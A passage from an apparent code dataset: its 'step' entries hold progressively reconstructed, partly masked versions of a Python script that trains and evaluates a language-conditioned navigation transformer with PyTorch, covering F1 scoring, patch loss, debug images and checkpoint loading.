dump_args.__dict__['__cwd__']\n del dump_args.__dict__['__path__']\n to_dump = dump_args.__dict__\n yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)\n else:\n print(f'loading model weights from {args.checkpoint_dir}')\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\n 'best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n num_blocks = 1\n trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,\n encoder=encoder, optimizer=optimizer, scheduler=scheduler,\n num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,\n checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.\n checkpoint_every, validation_limit=args.validation_limit,\n num_models_to_keep=args.num_models_to_keep, generate_after_n=args.\n generate_after_n, score_type=args.score_type, depth=depth,\n resolution=args.resolution, output_type=args.output_type,\n patch_size=args.patch_size, block_size=block_size, best_epoch=\n best_epoch, seed=args.seed, zero_weight=args.zero_weight,\n debug_image_top_k=args.debug_image_top_k, debug_image_threshold=\n args.debug_image_threshold)\n if not args.test:\n trainer.train()\n else:\n print(f'evaluating')\n acc = trainer.evaluate()\n print(f'accuracy: {acc}')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass NavigationTransformerTrainer(TransformerTrainer):\n\n def __init__(self, dataset_reader: NavigationDatasetReader, encoder:\n TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:\n Scheduler, num_epochs: int, num_blocks: int, device: torch.device,\n checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,\n resolution: int=64, patch_size: int=8, block_size: int=4,\n batch_size: int=16, output_type: str='per-pixel', checkpoint_every:\n int=64, validation_limit: int=16, depth: int=7, score_type: str=\n 'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,\n debug_image_top_k: int=None, debug_image_threshold: float=None):\n super(NavigationTransformerTrainer, self).__init__(train_data=[],\n val_data=[], encoder=encoder, optimizer=optimizer, scheduler=\n scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device\n =device, checkpoint_dir=checkpoint_dir, num_models_to_keep=\n num_models_to_keep, generate_after_n=generate_after_n,\n score_type=score_type, patch_size=patch_size, block_size=\n block_size, output_type=output_type, resolution=resolution,\n depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=\n zero_weight)\n self.f1_metric = F1Metric()\n self.dataset_reader = dataset_reader\n self.batch_size = batch_size\n self.checkpoint_every = checkpoint_every\n self.validation_limit = validation_limit\n if debug_image_top_k < 0:\n debug_image_top_k = None\n if debug_image_threshold < 0:\n debug_image_threshold = None\n self.debug_image_top_k = debug_image_top_k\n self.debug_image_threshold = debug_image_threshold\n\n def split_large_batch(self, batch):\n large_bsz = batch['path_state'].shape[0]\n small_batches = []\n for i in range(0, large_bsz, self.batch_size):\n small_batch = {}\n for k in batch.keys():\n small_batch[k] = batch[k][i:i + self.batch_size]\n small_batches.append(small_batch)\n return small_batches\n\n def validate_one_epoch(self, epoch, step, validation_limit):\n print(f'Validating epoch {epoch} step {step}...')\n total_prev_acc, total_next_acc = 0.0, 0.0\n total = 0\n self.encoder.eval()\n for b, dev_batch_instance in enumerate(self.dataset_reader.read(\n 'dev', validation_limit)):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, epoch, b, 0)\n total_next_acc += score_dict['next_f1']\n total += 1\n mean_next_acc = total_next_acc / total\n return mean_next_acc\n\n def evaluate(self):\n total_acc = 0.0\n total = 0\n total_block_acc = 0.0\n self.encoder.eval()\n for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.\n read('dev', self.validation_limit))):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, 10, b, 0, self.\n debug_image_top_k, self.debug_image_threshold)\n total_acc += score_dict['next_f1']\n total += 1\n mean_acc = total_acc / total\n print(f'Test-time pixel acc {mean_acc * 100}')\n return mean_acc\n\n def train_and_validate_one_epoch(self, epoch):\n print(f'Training epoch {epoch}...')\n self.encoder.train()\n skipped = 0\n step = 0\n for b, batch_instance in enumerate(self.dataset_reader.read('train')):\n actual_batches = self.split_large_batch(batch_instance)\n for sb, small_batch in enumerate(actual_batches):\n is_best = False\n self.optimizer.zero_grad()\n outputs = self.encoder(small_batch)\n if outputs is None:\n skipped += 1\n continue\n loss = self.compute_patch_loss(small_batch, outputs, self.\n next_to_prev_weight)\n loss.backward()\n self.optimizer.step()\n it = (epoch + 1) * (step + 1)\n self.scheduler.step_batch(it)\n if (step + 1) % self.checkpoint_every == 0:\n step_acc = self.validate_one_epoch(epoch, step, self.\n validation_limit)\n print(\n f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'\n )\n if step_acc > self.best_score:\n is_best = True\n self.best_score = step_acc\n self.save_model(f'{epoch}_{step}', is_best)\n step += 1\n print(f'skipped {skipped} examples')\n epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.\n validation_limit)\n print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')\n if self.score_type == 'acc':\n return epoch_acc / 2, -1.0\n else:\n raise AssertionError(f'invalid score type {self.score_type}')\n\n def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,\n 1.0]):\n \"\"\"\n compute per-patch for each patch \n \"\"\"\n bsz, w, h, __ = inputs['input_image'].shape\n pred_next_image = outputs['next_position']\n path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()\n true_next_image = image_to_tiles(path_state, self.patch_size)\n next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)\n next_patches = torch.zeros_like(next_sum_image)\n next_patches[next_sum_image != 0] = 1\n pred_next_image = pred_next_image.squeeze(-1)\n next_patches = next_patches.squeeze(-1).to(self.device).long()\n pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')\n next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,\n next_patches)\n total_loss = next_pixel_loss\n print(f'loss {total_loss.item()}')\n return total_loss\n\n def generate_debugging_image(self, true_img, path_state, pred_path,\n out_path, caption=None, top_k=None, threshold=None):\n caption = self.wrap_caption(caption)\n fig, ax = plt.subplots(2, 2, figsize=(16, 16))\n text_ax = ax[0, 1]\n text_ax.axis([0, 1, 0, 1])\n text_ax.text(0.2, 0.02, caption, fontsize=12)\n text_ax.axis('off')\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,\n verticalalignment='top', bbox=props)\n img_ax = ax[1, 0]\n true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]\n img_ax.imshow(true_img)\n true_path = path_state.detach().numpy()\n true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(\n float)\n true_ax = ax[0, 0]\n true_ax.imshow(true_path)\n pred_path = torch.softmax(pred_path, dim=0)\n pred_path = pred_path[1, :, :]\n pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)\n if top_k is not None:\n top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]\n top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))\n pred_path[top_k_inds] = 1.1\n pred_path[pred_path < 1.0] = 0\n pred_path[top_k_inds] = 1.0\n elif threshold is not None:\n pred_path[pred_path < threshold] = 0\n else:\n pred_path = pred_path\n pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)\n pred_ax = ax[1, 1]\n pred_ax.imshow(pred_path)\n file_path = f'{out_path}.png'\n print(f'saving to {file_path}')\n plt.savefig(file_path)\n plt.close()\n\n def validate(self, batch_instance, epoch_num, batch_num, instance_num,\n top_k, threshold):\n self.encoder.eval()\n outputs = self.encoder(batch_instance)\n next_position = outputs['next_position']\n next_position = tiles_to_image(next_position, self.patch_size,\n output_type='per-patch', upsample=True)\n next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[\n 'path_state'].unsqueeze(-1), next_position)\n if epoch_num > self.generate_after_n:\n for i in range(outputs['next_position'].shape[0]):\n output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'\n ).joinpath(f'instance_{i}')\n output_path.mkdir(parents=True, exist_ok=True)\n command = batch_instance['command'][i]\n command = [x for x in command if x != '<PAD>']\n command = ' '.join(command)\n image = batch_instance['input_image'][i]\n path_state = batch_instance['path_state'][i]\n pred_path = next_position[i]\n self.generate_debugging_image(image, path_state, pred_path,\n output_path, caption=command, top_k=top_k, threshold=\n threshold)\n return {'next_f1': next_f1}\n\n def compute_f1(self, true_pos, pred_pos):\n eps = 1e-08\n values, pred_pixels = torch.max(pred_pos, dim=1)\n gold_pixels = true_pos\n pred_pixels = pred_pixels.unsqueeze(1)\n pred_pixels = pred_pixels.detach().cpu().float()\n gold_pixels = gold_pixels.detach().cpu().float()\n total_pixels = sum(pred_pixels.shape)\n true_pos = torch.sum(pred_pixels * gold_pixels).item()\n true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()\n false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()\n false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()\n precision = true_pos / (true_pos + false_pos + eps)\n recall = true_pos / (true_pos + false_neg + eps)\n f1 = 2 * (precision * recall) / (precision + recall + eps)\n return precision, recall, f1\n\n\ndef main(args):\n device = 'cpu'\n if args.cuda is not None:\n free_gpu_id = get_free_gpu()\n if free_gpu_id > -1:\n device = f'cuda:{free_gpu_id}'\n device = torch.device(device)\n print(f'On device {device}')\n nlp = English()\n tokenizer = Tokenizer(nlp.vocab)\n dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=\n args.out_path, path_width=args.path_width, read_limit=args.\n read_limit, batch_size=args.batch_size, max_len=args.max_len,\n tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,\n is_bert='bert' in args.embedder)\n checkpoint_dir = pathlib.Path(args.checkpoint_dir)\n if not checkpoint_dir.exists():\n checkpoint_dir.mkdir()\n if not args.test:\n with open(dataset_reader.path_dict['train'].joinpath('vocab.json')\n ) as f1:\n train_vocab = json.load(f1)\n with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:\n json.dump(list(train_vocab), f1)\n else:\n print(f'Reading vocab from {checkpoint_dir}')\n with open(checkpoint_dir.joinpath('vocab.json')) as f1:\n train_vocab = json.load(f1)\n print(f'got data')\n print(f'constructing model...')\n if args.embedder == 'random':\n embedder = RandomEmbedder(tokenizer, train_vocab, args.\n embedding_dim, trainable=True)\n elif args.embedder == 'glove':\n embedder = GloveEmbedder(tokenizer, train_vocab, args.\n embedding_file, args.embedding_dim, trainable=True)\n elif args.embedder.startswith('bert'):\n embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.\n max_len)\n else:\n raise NotImplementedError(f'No embedder {args.embedder}')\n depth = 1\n encoder_cls = NavigationTransformerEncoder\n encoder_kwargs = dict(image_size=args.resolution, patch_size=args.\n patch_size, language_embedder=embedder, n_layers=args.n_layers,\n channels=args.channels, n_heads=args.n_heads, hidden_dim=args.\n hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout\n =args.embed_dropout, output_type=args.output_type,\n positional_encoding_type=args.pos_encoding_type, device=device,\n log_weights=args.test, locality_mask=args.locality_mask,\n locality_neighborhood=args.locality_neighborhood, init_scale=args.\n init_scale)\n encoder = encoder_cls(**encoder_kwargs)\n if args.cuda is not None:\n encoder = encoder.cuda(device)\n print(encoder)\n optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)\n scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=\n args.warmup, factor=args.lr_factor)\n best_epoch = -1\n block_size = int(args.resolution * 4 / 64)\n if not args.test:\n if not args.resume:\n try:\n os.mkdir(args.checkpoint_dir)\n except FileExistsError:\n try:\n assert len(glob.glob(os.path.join(args.checkpoint_dir,\n '*.th'))) == 0\n except AssertionError:\n raise AssertionError(\n f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'\n )\n else:\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).\n joinpath('best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n best_checkpoint_data = json.load(open(pathlib.Path(args.\n checkpoint_dir).joinpath('best_training_state.json')))\n print(f'best_checkpoint_data {best_checkpoint_data}')\n best_epoch = best_checkpoint_data['epoch']\n with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),\n 'w') as f1:\n dump_args = copy.deepcopy(args)\n del dump_args.__dict__['cfg']\n del dump_args.__dict__['__cwd__']\n del dump_args.__dict__['__path__']\n to_dump = dump_args.__dict__\n yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)\n else:\n print(f'loading model weights from {args.checkpoint_dir}')\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\n 'best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n num_blocks = 1\n trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,\n encoder=encoder, optimizer=optimizer, scheduler=scheduler,\n num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,\n checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.\n checkpoint_every, validation_limit=args.validation_limit,\n num_models_to_keep=args.num_models_to_keep, generate_after_n=args.\n generate_after_n, score_type=args.score_type, depth=depth,\n resolution=args.resolution, output_type=args.output_type,\n patch_size=args.patch_size, block_size=block_size, best_epoch=\n best_epoch, seed=args.seed, zero_weight=args.zero_weight,\n debug_image_top_k=args.debug_image_top_k, debug_image_threshold=\n args.debug_image_threshold)\n if not args.test:\n trainer.train()\n else:\n print(f'evaluating')\n acc = trainer.evaluate()\n print(f'accuracy: {acc}')\n\n\nif __name__ == '__main__':\n np.random.seed(12)\n torch.manual_seed(12)\n parser = configure_parser()\n args = parser.parse_args()\n main(args)\n",
"step-4": "<mask token>\nlogger = logging.getLogger(__name__)\n\n\nclass NavigationTransformerTrainer(TransformerTrainer):\n\n def __init__(self, dataset_reader: NavigationDatasetReader, encoder:\n TransformerEncoder, optimizer: torch.optim.Optimizer, scheduler:\n Scheduler, num_epochs: int, num_blocks: int, device: torch.device,\n checkpoint_dir: str, num_models_to_keep: int, generate_after_n: int,\n resolution: int=64, patch_size: int=8, block_size: int=4,\n batch_size: int=16, output_type: str='per-pixel', checkpoint_every:\n int=64, validation_limit: int=16, depth: int=7, score_type: str=\n 'acc', best_epoch: int=-1, seed: int=12, zero_weight: float=0.05,\n debug_image_top_k: int=None, debug_image_threshold: float=None):\n super(NavigationTransformerTrainer, self).__init__(train_data=[],\n val_data=[], encoder=encoder, optimizer=optimizer, scheduler=\n scheduler, num_epochs=num_epochs, num_blocks=num_blocks, device\n =device, checkpoint_dir=checkpoint_dir, num_models_to_keep=\n num_models_to_keep, generate_after_n=generate_after_n,\n score_type=score_type, patch_size=patch_size, block_size=\n block_size, output_type=output_type, resolution=resolution,\n depth=depth, best_epoch=best_epoch, seed=seed, zero_weight=\n zero_weight)\n self.f1_metric = F1Metric()\n self.dataset_reader = dataset_reader\n self.batch_size = batch_size\n self.checkpoint_every = checkpoint_every\n self.validation_limit = validation_limit\n if debug_image_top_k < 0:\n debug_image_top_k = None\n if debug_image_threshold < 0:\n debug_image_threshold = None\n self.debug_image_top_k = debug_image_top_k\n self.debug_image_threshold = debug_image_threshold\n\n def split_large_batch(self, batch):\n large_bsz = batch['path_state'].shape[0]\n small_batches = []\n for i in range(0, large_bsz, self.batch_size):\n small_batch = {}\n for k in batch.keys():\n small_batch[k] = batch[k][i:i + self.batch_size]\n small_batches.append(small_batch)\n return small_batches\n\n def validate_one_epoch(self, epoch, step, validation_limit):\n print(f'Validating epoch {epoch} step {step}...')\n total_prev_acc, total_next_acc = 0.0, 0.0\n total = 0\n self.encoder.eval()\n for b, dev_batch_instance in enumerate(self.dataset_reader.read(\n 'dev', validation_limit)):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, epoch, b, 0)\n total_next_acc += score_dict['next_f1']\n total += 1\n mean_next_acc = total_next_acc / total\n return mean_next_acc\n\n def evaluate(self):\n total_acc = 0.0\n total = 0\n total_block_acc = 0.0\n self.encoder.eval()\n for b, dev_batch_instance in tqdm(enumerate(self.dataset_reader.\n read('dev', self.validation_limit))):\n actual_batches = self.split_large_batch(dev_batch_instance)\n for small_batch in actual_batches:\n score_dict = self.validate(small_batch, 10, b, 0, self.\n debug_image_top_k, self.debug_image_threshold)\n total_acc += score_dict['next_f1']\n total += 1\n mean_acc = total_acc / total\n print(f'Test-time pixel acc {mean_acc * 100}')\n return mean_acc\n\n def train_and_validate_one_epoch(self, epoch):\n print(f'Training epoch {epoch}...')\n self.encoder.train()\n skipped = 0\n step = 0\n for b, batch_instance in enumerate(self.dataset_reader.read('train')):\n actual_batches = self.split_large_batch(batch_instance)\n for sb, small_batch in enumerate(actual_batches):\n is_best = False\n self.optimizer.zero_grad()\n outputs = self.encoder(small_batch)\n if outputs is None:\n skipped += 1\n continue\n loss = self.compute_patch_loss(small_batch, outputs, self.\n next_to_prev_weight)\n loss.backward()\n self.optimizer.step()\n it = (epoch + 1) * (step + 1)\n self.scheduler.step_batch(it)\n if (step + 1) % self.checkpoint_every == 0:\n step_acc = self.validate_one_epoch(epoch, step, self.\n validation_limit)\n print(\n f'Epoch {epoch} step {step} has next pixel F1 {step_acc * 100:.2f}'\n )\n if step_acc > self.best_score:\n is_best = True\n self.best_score = step_acc\n self.save_model(f'{epoch}_{step}', is_best)\n step += 1\n print(f'skipped {skipped} examples')\n epoch_acc = self.validate_one_epoch(epoch, step, 10 * self.\n validation_limit)\n print(f'Epoch {epoch} has next pixel F1 {epoch_acc * 100:.2f}')\n if self.score_type == 'acc':\n return epoch_acc / 2, -1.0\n else:\n raise AssertionError(f'invalid score type {self.score_type}')\n\n def compute_patch_loss(self, inputs, outputs, next_to_prev_weight=[1.0,\n 1.0]):\n \"\"\"\n compute per-patch for each patch \n \"\"\"\n bsz, w, h, __ = inputs['input_image'].shape\n pred_next_image = outputs['next_position']\n path_state = inputs['path_state'].reshape(bsz, 1, w, h).float()\n true_next_image = image_to_tiles(path_state, self.patch_size)\n next_sum_image = torch.sum(true_next_image, dim=2, keepdim=True)\n next_patches = torch.zeros_like(next_sum_image)\n next_patches[next_sum_image != 0] = 1\n pred_next_image = pred_next_image.squeeze(-1)\n next_patches = next_patches.squeeze(-1).to(self.device).long()\n pred_next_image = rearrange(pred_next_image, 'b n c -> b c n')\n next_pixel_loss = self.weighted_xent_loss_fxn(pred_next_image,\n next_patches)\n total_loss = next_pixel_loss\n print(f'loss {total_loss.item()}')\n return total_loss\n\n def generate_debugging_image(self, true_img, path_state, pred_path,\n out_path, caption=None, top_k=None, threshold=None):\n caption = self.wrap_caption(caption)\n fig, ax = plt.subplots(2, 2, figsize=(16, 16))\n text_ax = ax[0, 1]\n text_ax.axis([0, 1, 0, 1])\n text_ax.text(0.2, 0.02, caption, fontsize=12)\n text_ax.axis('off')\n props = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n text_ax.text(0.05, 0.95, caption, wrap=True, fontsize=14,\n verticalalignment='top', bbox=props)\n img_ax = ax[1, 0]\n true_img = true_img.detach().cpu().numpy().astype(float)[:, :, 0:3]\n img_ax.imshow(true_img)\n true_path = path_state.detach().numpy()\n true_path = np.tile(true_path.reshape(512, 512, 1), (1, 1, 3)).astype(\n float)\n true_ax = ax[0, 0]\n true_ax.imshow(true_path)\n pred_path = torch.softmax(pred_path, dim=0)\n pred_path = pred_path[1, :, :]\n pred_path = pred_path.cpu().detach().numpy().reshape(512, 512, 1)\n if top_k is not None:\n top_k_inds = np.argpartition(pred_path, -top_k, axis=None)[-top_k:]\n top_k_inds = np.unravel_index(top_k_inds, shape=(512, 512))\n pred_path[top_k_inds] = 1.1\n pred_path[pred_path < 1.0] = 0\n pred_path[top_k_inds] = 1.0\n elif threshold is not None:\n pred_path[pred_path < threshold] = 0\n else:\n pred_path = pred_path\n pred_path = np.tile(pred_path, (1, 1, 3)).astype(float)\n pred_ax = ax[1, 1]\n pred_ax.imshow(pred_path)\n file_path = f'{out_path}.png'\n print(f'saving to {file_path}')\n plt.savefig(file_path)\n plt.close()\n\n def validate(self, batch_instance, epoch_num, batch_num, instance_num,\n top_k, threshold):\n self.encoder.eval()\n outputs = self.encoder(batch_instance)\n next_position = outputs['next_position']\n next_position = tiles_to_image(next_position, self.patch_size,\n output_type='per-patch', upsample=True)\n next_p, next_r, next_f1 = self.f1_metric.compute_f1(batch_instance[\n 'path_state'].unsqueeze(-1), next_position)\n if epoch_num > self.generate_after_n:\n for i in range(outputs['next_position'].shape[0]):\n output_path = self.checkpoint_dir.joinpath(f'batch_{batch_num}'\n ).joinpath(f'instance_{i}')\n output_path.mkdir(parents=True, exist_ok=True)\n command = batch_instance['command'][i]\n command = [x for x in command if x != '<PAD>']\n command = ' '.join(command)\n image = batch_instance['input_image'][i]\n path_state = batch_instance['path_state'][i]\n pred_path = next_position[i]\n self.generate_debugging_image(image, path_state, pred_path,\n output_path, caption=command, top_k=top_k, threshold=\n threshold)\n return {'next_f1': next_f1}\n\n def compute_f1(self, true_pos, pred_pos):\n eps = 1e-08\n values, pred_pixels = torch.max(pred_pos, dim=1)\n gold_pixels = true_pos\n pred_pixels = pred_pixels.unsqueeze(1)\n pred_pixels = pred_pixels.detach().cpu().float()\n gold_pixels = gold_pixels.detach().cpu().float()\n total_pixels = sum(pred_pixels.shape)\n true_pos = torch.sum(pred_pixels * gold_pixels).item()\n true_neg = torch.sum((1 - pred_pixels) * (1 - gold_pixels)).item()\n false_pos = torch.sum(pred_pixels * (1 - gold_pixels)).item()\n false_neg = torch.sum((1 - pred_pixels) * gold_pixels).item()\n precision = true_pos / (true_pos + false_pos + eps)\n recall = true_pos / (true_pos + false_neg + eps)\n f1 = 2 * (precision * recall) / (precision + recall + eps)\n return precision, recall, f1\n\n\ndef main(args):\n device = 'cpu'\n if args.cuda is not None:\n free_gpu_id = get_free_gpu()\n if free_gpu_id > -1:\n device = f'cuda:{free_gpu_id}'\n device = torch.device(device)\n print(f'On device {device}')\n nlp = English()\n tokenizer = Tokenizer(nlp.vocab)\n dataset_reader = NavigationDatasetReader(dir=args.data_dir, out_path=\n args.out_path, path_width=args.path_width, read_limit=args.\n read_limit, batch_size=args.batch_size, max_len=args.max_len,\n tokenizer=tokenizer, shuffle=args.shuffle, overfit=args.overfit,\n is_bert='bert' in args.embedder)\n checkpoint_dir = pathlib.Path(args.checkpoint_dir)\n if not checkpoint_dir.exists():\n checkpoint_dir.mkdir()\n if not args.test:\n with open(dataset_reader.path_dict['train'].joinpath('vocab.json')\n ) as f1:\n train_vocab = json.load(f1)\n with open(checkpoint_dir.joinpath('vocab.json'), 'w') as f1:\n json.dump(list(train_vocab), f1)\n else:\n print(f'Reading vocab from {checkpoint_dir}')\n with open(checkpoint_dir.joinpath('vocab.json')) as f1:\n train_vocab = json.load(f1)\n print(f'got data')\n print(f'constructing model...')\n if args.embedder == 'random':\n embedder = RandomEmbedder(tokenizer, train_vocab, args.\n embedding_dim, trainable=True)\n elif args.embedder == 'glove':\n embedder = GloveEmbedder(tokenizer, train_vocab, args.\n embedding_file, args.embedding_dim, trainable=True)\n elif args.embedder.startswith('bert'):\n embedder = BERTEmbedder(model_name=args.embedder, max_seq_len=args.\n max_len)\n else:\n raise NotImplementedError(f'No embedder {args.embedder}')\n depth = 1\n encoder_cls = NavigationTransformerEncoder\n encoder_kwargs = dict(image_size=args.resolution, patch_size=args.\n patch_size, language_embedder=embedder, n_layers=args.n_layers,\n channels=args.channels, n_heads=args.n_heads, hidden_dim=args.\n hidden_dim, ff_dim=args.ff_dim, dropout=args.dropout, embed_dropout\n =args.embed_dropout, output_type=args.output_type,\n positional_encoding_type=args.pos_encoding_type, device=device,\n log_weights=args.test, locality_mask=args.locality_mask,\n locality_neighborhood=args.locality_neighborhood, init_scale=args.\n init_scale)\n encoder = encoder_cls(**encoder_kwargs)\n if args.cuda is not None:\n encoder = encoder.cuda(device)\n print(encoder)\n optimizer = torch.optim.Adam(encoder.parameters(), lr=args.learn_rate)\n scheduler = NoamLR(optimizer, model_size=args.hidden_dim, warmup_steps=\n args.warmup, factor=args.lr_factor)\n best_epoch = -1\n block_size = int(args.resolution * 4 / 64)\n if not args.test:\n if not args.resume:\n try:\n os.mkdir(args.checkpoint_dir)\n except FileExistsError:\n try:\n assert len(glob.glob(os.path.join(args.checkpoint_dir,\n '*.th'))) == 0\n except AssertionError:\n raise AssertionError(\n f'Output directory {args.checkpoint_dir} non-empty, will not overwrite!'\n )\n else:\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).\n joinpath('best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n best_checkpoint_data = json.load(open(pathlib.Path(args.\n checkpoint_dir).joinpath('best_training_state.json')))\n print(f'best_checkpoint_data {best_checkpoint_data}')\n best_epoch = best_checkpoint_data['epoch']\n with open(pathlib.Path(args.checkpoint_dir).joinpath('config.yaml'),\n 'w') as f1:\n dump_args = copy.deepcopy(args)\n del dump_args.__dict__['cfg']\n del dump_args.__dict__['__cwd__']\n del dump_args.__dict__['__path__']\n to_dump = dump_args.__dict__\n yaml.safe_dump(to_dump, f1, encoding='utf-8', allow_unicode=True)\n else:\n print(f'loading model weights from {args.checkpoint_dir}')\n encoder = encoder.to('cpu')\n state_dict = torch.load(pathlib.Path(args.checkpoint_dir).joinpath(\n 'best.th'), map_location='cpu')\n encoder.load_state_dict(state_dict, strict=True)\n encoder = encoder.cuda(device)\n num_blocks = 1\n trainer = NavigationTransformerTrainer(dataset_reader=dataset_reader,\n encoder=encoder, optimizer=optimizer, scheduler=scheduler,\n num_epochs=args.num_epochs, num_blocks=num_blocks, device=device,\n checkpoint_dir=args.checkpoint_dir, checkpoint_every=args.\n checkpoint_every, validation_limit=args.validation_limit,\n num_models_to_keep=args.num_models_to_keep, generate_after_n=args.\n generate_after_n, score_type=args.score_type, depth=depth,\n resolution=args.resolution, output_type=args.output_type,\n patch_size=args.patch_size, block_size=block_size, best_epoch=\n best_epoch, seed=args.seed, zero_weight=args.zero_weight,\n debug_image_top_k=args.debug_image_top_k, debug_image_threshold=\n args.debug_image_threshold)\n if not args.test:\n trainer.train()\n else:\n print(f'evaluating')\n acc = trainer.evaluate()\n print(f'accuracy: {acc}')\n\n\nif __name__ == '__main__':\n np.random.seed(12)\n torch.manual_seed(12)\n parser = configure_parser()\n args = parser.parse_args()\n main(args)\n",
"step-5": "import json \nfrom jsonargparse import ArgumentParser, ActionConfigFile \nimport yaml \nfrom typing import List, Dict\nimport glob\nimport os \nimport pathlib\nimport pdb \nimport subprocess \nimport copy \nfrom io import StringIO\nfrom collections import defaultdict\n\nimport torch\nfrom spacy.tokenizer import Tokenizer\nfrom spacy.lang.en import English\nfrom einops import rearrange \nimport logging \nfrom tqdm import tqdm \nimport matplotlib\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches as patches\nfrom matplotlib import gridspec\nimport numpy as np\nimport torch.autograd.profiler as profiler\nfrom torch.nn import functional as F\nfrom torch.optim.lr_scheduler import StepLR\nfrom allennlp.training.scheduler import Scheduler \nfrom allennlp.training.learning_rate_schedulers import NoamLR\nimport pandas as pd \n\nfrom transformer import TransformerEncoder, ResidualTransformerEncoder, image_to_tiles, tiles_to_image\nfrom metrics import MSEMetric, AccuracyMetric, F1Metric\nfrom language_embedders import RandomEmbedder, GloveEmbedder, BERTEmbedder\nfrom navigation_data import NavigationDatasetReader, NavigationImageTrajectory, configure_parser\nfrom train_language_encoder import get_free_gpu, load_data, get_vocab, LanguageTrainer, FlatLanguageTrainer\nfrom navigation_transformer import NavigationTransformerEncoder\nfrom train_transformer import TransformerTrainer\n\nlogger = logging.getLogger(__name__)\n\nclass NavigationTransformerTrainer(TransformerTrainer): \n def __init__(self,\n dataset_reader: NavigationDatasetReader,\n encoder: TransformerEncoder,\n optimizer: torch.optim.Optimizer,\n scheduler: Scheduler, \n num_epochs: int,\n num_blocks: int, \n device: torch.device,\n checkpoint_dir: str,\n num_models_to_keep: int,\n generate_after_n: int,\n resolution: int = 64, \n patch_size: int = 8,\n block_size: int = 4, \n batch_size: int = 16, \n output_type: str = \"per-pixel\", \n checkpoint_every: int = 64,\n validation_limit: int = 16, \n depth: int = 7,\n score_type: str = \"acc\",\n best_epoch: int = -1,\n seed: int = 12, \n zero_weight: float = 0.05,\n debug_image_top_k: int = None,\n debug_image_threshold: float = None):\n super(NavigationTransformerTrainer, self).__init__(train_data=[],\n val_data=[],\n encoder=encoder,\n optimizer=optimizer,\n scheduler=scheduler,\n num_epochs=num_epochs,\n num_blocks=num_blocks,\n device=device,\n checkpoint_dir=checkpoint_dir,\n num_models_to_keep=num_models_to_keep,\n generate_after_n=generate_after_n,\n score_type=score_type,\n patch_size=patch_size,\n block_size=block_size,\n output_type=output_type,\n resolution=resolution, \n depth=depth, \n best_epoch=best_epoch,\n seed=seed,\n zero_weight=zero_weight) \n self.f1_metric = F1Metric() \n self.dataset_reader = dataset_reader\n self.batch_size = batch_size \n self.checkpoint_every = checkpoint_every\n self.validation_limit = validation_limit\n if debug_image_top_k < 0:\n debug_image_top_k = None\n if debug_image_threshold < 0:\n debug_image_threshold = None\n self.debug_image_top_k = debug_image_top_k\n self.debug_image_threshold = debug_image_threshold\n\n def split_large_batch(self, batch):\n large_bsz = batch['path_state'].shape[0]\n small_batches = 